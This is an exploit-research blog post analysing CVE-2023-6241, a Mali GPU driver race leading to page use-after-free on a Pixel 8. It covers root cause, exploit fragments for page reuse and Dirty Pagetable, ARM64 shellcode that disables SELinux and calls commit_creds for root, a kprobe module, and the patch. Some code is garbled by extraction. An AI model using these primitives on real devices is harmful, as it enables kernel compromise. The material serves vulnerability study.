Gone in 5 Seconds: How WARN_ON Stole 10 Minutes

As part of my internship at STAR Labs, I was tasked to conduct N-day analysis of CVE-2023-6241. The original PoC can be found here, along with the accompanying write-up.

In this blog post, I will explain the root cause as well as an alternative exploitation technique used to exploit the page UAF, achieving arbitrary kernel code execution.

The following exploit was tested on a Pixel 8 running the latest version available prior to the patch.

“`
shiba:/ $ getprop ro.build.fingerprint google/shiba/shiba:14/UQ1A.240205.004/11269751:user/release-keys
“`

# Root Cause Analysis

The bug occurs due to a race condition in the `kbase_jit_grow` function ( _source_).

The race window opens when the number of physical pages requested by the caller exceed the number of pages in the `kctx`’s mempool. The lock will be dropped to allow the mempool to be refilled by the kernel.

After refilling, the previously calculated `old_size` value is used for calculation by `kbase_mem_grow_gpu_mapping`, for mapping the new pages. The code incorrectly assumes that the previous `old_size` and `nents` still hold the same value after the while loop below.

“`
/* Grow the backing */ old_size = reg->gpu_alloc->nents; // previous old_size /* Allocate some more pages */ delta = info->commit_pages – reg->gpu_alloc->nents; pages_required = delta; … while (kbase_mem_pool_size(pool) mem_partials_lock); kbase_gpu_vm_unlock(kctx); // lock dropped ret = kbase_mem_pool_grow(pool, pool_delta, kctx->task); // race window here kbase_gpu_vm_lock(kctx); // lock reacquired if (ret) goto update_failed; spin_lock(&kctx->mem_partials_lock); kbase_mem_pool_lock(pool); } // after race window, actual nents may be greater than the old_size … ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages, old_size, mmu_sync_info);
“`

If we were to introduce a page fault via a write instruction to grow the JIT memory region during the race window, the actual number of backing pages ( `reg->gpu_alloc->nents`) will be greater than the cached `old_size`.

> _During a page fault, the page fault handler will map and back physical pages up to the faulting address._

“`
—————————– | old_size | FAULT_SIZE | —————————–
“`

### Backing pages

`kbase_jit_grow` adds backing pages to the memory region with the line:

“`
kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool, delta, &prealloc_sas[0])
“`

The `delta` argument is the cached value saved before the race window, which has the same value as `old_size`. When we look at the `kbase_alloc_phy_pages_helper_locked` function, it references the new `reg->gpu_alloc->nents` value instead, and uses it as the start offset to add `delta` pages (source). In other words, physical backing pages are allocated from offset `nents` to `nents + delta`

### Mapping pages

`kbase_jit_grow` then tries to map the pages with:

“`
kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages, old_size, mmu_sync_info)
“`

When mapping the new pages, `kbase_mem_grow_gpu_mapping` calculates `delta` as `info->commit_pages – old_size` and starts mapping `delta` pages starting from `old_size`. Since `kbase_mem_grow_gpu_mapping` does not ‘know’ that the region’s actual `nents` have increased, it will fail to map the last `FAULT_SIZE` pages.

We will now end up with a state where the right portion of the memory region is unmapped but backed by physical pages.

# Exploit

In order to make this exploitable, we need to first understand how the Mali driver handles shrinking and freeing of memory regions.

> _The original writeup explains it pretty well._

The idea is to create a memory region in which a portion remains unmapped while the surrounding areas are still mapped. This configuration causes the shrinking routine to skip unmapping that specific portion, even if its backing page is marked for release.

To achieve that, we can introduce a second fault near the end of the existing memory region to fulfil the criteria.

After which, we shrink the memory region, which causes the GPU to start unmapping after `final_size`. The Mali driver will skip unmapping mappings in `PTE1` since it is unmapped and invalid. When it reaches `PTE2`, since the 1st entry in `PTE2` is invalid as the corresponding address is unmapped, `kbase_mmu_teardown_pgd_pages` will skip unmapping the next 512 virtual pages. However, that should not have been the case since there are still valid PTEs that needs to be unmapped.

“`
————————————————————– | mapped | unmapped | mapped | ————————————————————– |– PTE1 –|– PTE2 –| *region skipped unmapping but backing pages are freed
“`

We can set `FAULT_SIZE` to be 0x300 pages, such that it occupies slightly more than 1 last level PTE ( _can hold 0x200 pages_). Hence, there will be a portion of the memory in `second_fault` that remains mapped after shrinking. However, all the physical pages after `final_size` are freed.

At this point, we are still able to access this invalid mapped region ( `write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000`), whose physical page has been freed. We need to reclaim this freed page before it gets consumed by other objects. Our goal is to force 2 virtual memory regions to reference the same physical page

1. Mass allocate and map memory regions from the GPU
2. Write a magic value into the region where the memory is mapped to a freed page.
3. Scan all the allocated regions in (1) for the magic value to find which physical page has been reused.

Now we know that the `write_addr` and `reused_addr` both reference the same physical page

“`
create_reuse_regions(mali_fd, &(reused_regions[0]), REUSE_REG_SIZE); value = TEST_VAL; write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000; LOG(“writing to gpu_va %lxn”, write_addr); write_to(mali_fd, &write_addr, &value, command_queue, &kernel); uint64_t reused_addr = find_reused_page(&(reused_regions[0]), REUSE_REG_SIZE); if (reused_addr == -1) { err(1, “Cannot find reused pagen”); }
“`

## Arbitrary R/W

At this point, we have a state where we hold 2 memory regions( `write_addr` & `reused_addr`) that reference the same physical page. Our next goal is to turn this overlapping page into a stronger arbitrary read and write primitive.

The original exploit reuses the freed page by spraying Mali GPU’s PGDs. Since we are able to read and write access to the freed page, we are able to control a PTE within the newly allocated PGD. This allows us to change the backing page of our reserved buffer to point to any memory region, and subsequently use it to modify kernel functions.

> _Details explained in the original writeup_

There were a few interesting things to note in how Mali handles memory allocations, according to the writeup:

1. Memory allocations of physical pages for Mali drivers are done in tiers.
– It first draws from the context pool, followed by the device pool. If both pools are unable to fulfil the request, it will then request for pages from the kernel buddy allocator.
2. The GPU’s PGD allocations are requested from `kbdev` mempool, which is the device’s mempool.

Hence, the original exploit presented a technique to reliably place a free page into the `kbdev` pool for allocation of PGDs to reuse:

1. Allocate some pages from the GPU (used for spraying PGDs)
2. Allocate `MAX_POOL_SIZE` pages
3. Free `MAX_POOL_SIZE` pages
4. Free our UAF page ( `reused_addr`) into `kbdev` mempool
5. Map and write to the allocated pages in (1), which will cause the allocation of new PGDs in the GPU. Hopefully, it reuses the page referenced by `reused_addr`
6. Scan the memory region from `write_addr` to find PTEs.

The exploit is now able to control the physical backing pages of the reserved pages in (1) just by modifying the PTEs and subsequently achieving arbitrary r/w.

> _Check the device’s_ `MAX_POOL_SIZE` from: `shiba:/ $ cat /sys/module/mali_kbase/drivers/platform:mali/1f000000.mali/mem_pool_max_size 16384 16384 16384 16384`

## Other Pathways

My mentor Peter suggested that I utilise the Page UAF primitive to explore other kernel exploitation techniques.

To achieve that, we first need to get the freeing page out of GPU’s control. We can modify the original exploit to drain `2 * MAX_POOL_SIZE pages` instead, which fills up both the context and device mempool. This causes the subsequent freed page to be returned directly to the kernel buddy allocator instead of being retained within the Mali driver.

We are now able to use the usual Linux kernel exploit techniques to spray kernel objects. I originally tried to start by spraying `pipe_buffer` since it is commonly used in other exploits and is user controllable. However, I was unable to get the objects to reuse the UAF page reliably. I then came across the Dirty Pagetable technique used by ptr-yudai which worked well for me. This technique is very similar to that used in the original exploit, except that it operates outside of the GPU.

We first `mmap` a large memory region in the virtual address space. These virtual memory regions will not be backed by any physical pages until memory accesses are performed on it.

“`
void* page_spray[N_PAGESPRAY]; for (int i=0; i 2 regions in page_spray will now have the same backing page uint64_t first_pte_val = read_from(mali_fd, &write_addr, command_queue, &kernel); if (first_pte_val == TEST_VAL) { err(1, “[!] pte spray failedn”); } uintptr_t second_pte_addr = write_addr + 8; uint64_t second_pte_val = read_from(mali_fd, &second_pte_addr, command_queue, &kernel); write_to(mali_fd, &write_addr, &second_pte_val, command_queue, &kernel); usleep(10000); // Iterate through all the regions using the id, to find which region is corrupted void* corrupted_mapping_addr = 0; for (int i = 0; i _This is a pretty good article which explains common ways to bypass SELinux on Android_

The simplest way to bypass SELinux on this device is to overwrite the `state->enforcing` value to `false`. To achieve this, we can overwrite the `avc_denied` function in kernel text to always grant all permission requests, even if it was originally supposed to be denied.

The first argument of avc_denied is the `selinux_state`,

“`
static noinline int avc_denied(struct selinux_state *state, u32 ssid, u32 tsid, u16 tclass, u32 requested, u8 driver, u8 xperm, unsigned int flags, struct av_decision *avd)
“`

Hence, we can use it to overwrite into the `enforcing` field with the shellcode:

“`
strb wzr, [x0] // set selinux_state->enforcing to false mov x0, #0 // grants the request ret
“`

### Root

Like many other linux exploits, we can achieve `root` by calling `commit_creds(&init_cred)`. Since `sel_read_enforce` can be invoked when we read from `/sys/fs/selinux/enforce`, we overwrite the function with the shellcode:

“`
adrp x0, init_cred add x0, x0, :lo12:init_cred adrp x8, commit_creds add x8, x8, :lo12:commit_creds stp x29, x30, [sp, #-0x10] blr x8 ldp x29, x30, [sp], #0x10 ret
“`

We can combine everything we’ve got so far to exploit the Pixel 8 successfully from the unprivileged `untrusted_app_27` context. Unfortunately, the exploit takes quite a while to complete (around 10 minutes from my testing).

## ‘Fix’ delay

To understand why the exploit has a 10 minute delay, we can check kmsg for logs. There were a lot of warnings thrown with the same stack dump.

“`
[ 1881.358317][ T8672] ————[ cut here ]———— [ 1881.363557][ T8672] WARNING: CPU: 8 PID: 8672 at ../private/google-modules/gpu/mali_kbase/mmu/mali_kbase_mmu.c:2429 mmu_insert_pages_no_flush+0x2f8/0x76c [mali_kbase] [ 1881.787213][ T8672] CPU: 8 PID: 8672 Comm: poc Tainted: G S W OE 5.15.110-android14-11-gcc48824eebe8-dirty #1 [ 1881.797995][ T8672] Hardware name: ZUMA SHIBA MP based on ZUMA (DT) [ 1881.804254][ T8672] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=–) [ 1881.811905][ T8672] pc : mmu_insert_pages_no_flush+0x2f8/0x76c [mali_kbase] [ 1881.818856][ T8672] lr : mmu_insert_pages_no_flush+0x2e4/0x76c [mali_kbase] [ 1881.825813][ T8672] sp : ffffffc022e53880 [ 1881.829810][ T8672] x29: ffffffc022e53940 x28: ffffffd6e2e55378 x27: ffffffc01f26d0a8 [ 1881.837639][ T8672] x26: 000000000000caec x25: 00000000000000cb x24: 0000000000000001 [ 1881.845462][ T8672] x23: ffffff892fd0b000 x22: 00000000000001ff x21: 00000000000000ca [ 1881.853287][ T8672] x20: ffffff8019cf0000 x19: 000000089ad27000 x18: ffffffd6e603c4d8 [ 1881.861111][ T8672] x17: ffffffd6e53d9690 x16: 000000000000000a x15: 0000000000000401 [ 1881.868936][ T8672] x14: 0000000000000401 x13: 0000000000007ff3 x12: 0000000000000f02 [ 1881.876760][ T8672] x11: 000000000000ffff x10: 0000000000000f02 x9 : 000ffffffd6e2e55 [ 1881.884584][ T8672] x8 : 004000089ad26743 x7 : ffffffc022e539a0 x6 : 0000000000000000 [ 1881.892410][ T8672] x5 : 000000000000caec x4 : 0000000000001ff5 x3 : 004000089ad27743 [ 1881.900234][ T8672] x2 : 0000000000000003 x1 : 0000000000000000 x0 : 004000089ad27743 [ 1881.908060][ T8672] Call trace: [ 1881.911188][ T8672] mmu_insert_pages_no_flush+0x2f8/0x76c [mali_kbase] [ 1881.917796][ T8672] kbase_mmu_insert_pages+0x48/0x9c [mali_kbase] [ 1881.923968][ T8672] kbase_mem_grow_gpu_mapping+0x58/0x68 [mali_kbase] [ 1881.930486][ T8672] kbase_jit_allocate+0x4e0/0x804 [mali_kbase] [ 1881.936488][ T8672] kcpu_queue_process+0xcb4/0x1644 [mali_kbase] [ 1881.942574][ T8672] kbase_csf_kcpu_queue_enqueue+0x1678/0x1d9c [mali_kbase] [ 1881.949615][ T8672] kbase_kfile_ioctl+0x3750/0x6e40 [mali_kbase] [ 1881.955701][ T8672] kbase_ioctl+0x6c/0x104 [mali_kbase] [ 1881.961004][ T8672] __arm64_sys_ioctl+0xa4/0x114 [ 1881.965695][ T8672] invoke_syscall+0x5c/0x140 [ 1881.970134][ T8672] el0_svc_common.llvm.10074779959175133548+0xb4/0xf0 [ 1881.976741][ T8672] do_el0_svc+0x24/0x84 [ 1881.980740][ T8672] el0_svc+0x2c/0xa4 [ 1881.984477][ T8672] el0t_64_sync_handler+0x68/0xb4 [ 1881.989347][ T8672] el0t_64_sync+0x1b0/0x1b4 [ 1881.993693][ T8672] —[ end trace 52f32383958e509a ]—
“`

It seems that the faulting line is at `../private/google-modules/gpu/mali_kbase/mmu/mali_kbase_mmu.c:2429` in the `mmu_insert_pages_no_flush` function. In the source code, we see that `WARN_ON` is called within the loop, which matches what we see in kmsg.

“`
for (i = 0; i —————————– | old_size | FAULT_SIZE | —————————–
“`

However, we cannot reduce the `FAULT_SIZE` much as the number of pages has to be more than the size of a last level PTE, as mentioned above. Unfortunately, I was not able to find other ways to skip the check solely through the exploit.

Nonetheless, I was able to write a loadable kernel module to skip the warning to speed up my testing. We can use kprobe to skip the branch to `0x84C2C`, which effectively stops the delay entirely.

“`
// LKM to skip mmu_insert_pages_no_flush warning #define pr_fmt(fmt) “%s: ” fmt, __func__ #include #include #include #define MAX_SYMBOL_LEN 64 static char symbol[MAX_SYMBOL_LEN] = “mmu_insert_pages_no_flush”; module_param_string(symbol, symbol, sizeof(symbol), 0644); static struct kprobe kp = { .symbol_name = symbol, .offset = 0x27c, }; static int __kprobes handler_pre(struct kprobe *p, struct pt_regs *regs) { instruction_pointer_set(regs, instruction_pointer(regs) + 4); return 1; } static int __init kprobe_init(void) { int ret; kp.pre_handler = handler_pre; ret = register_kprobe(&kp); if (ret gpu_alloc->nents >= info->commit_pages) goto done; – /* Grow the backing */ – old_size = reg->gpu_alloc->nents; – /* Allocate some more pages */ delta = info->commit_pages – reg->gpu_alloc->nents; pages_required = delta; @@ -4111,6 +4108,17 @@ kbase_mem_pool_lock(pool); } + if (reg->gpu_alloc->nents >= info->commit_pages) { + kbase_mem_pool_unlock(pool); + spin_unlock(&kctx->mem_partials_lock); + dev_info( + kctx->kbdev->dev, + “JIT alloc grown beyond the required number of initially required pages, this grow no longer needed.”); + goto done; + } + + old_size = reg->gpu_alloc->nents; + delta = info->commit_pages – old_size; gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool, delta, &prealloc_sas[0]); if (!gpu_pages) {
“`

It first checks if the actual number of backing pages is greater than the request’s `commit_pages` after the race window. If the grow is not needed, the function will return early, skipping the function that maps the `delta` pages.

It also recalculates the `old_size` after the race window instead of using the cached value.

# References

– https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/
– https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606

Leave a Reply Cancel reply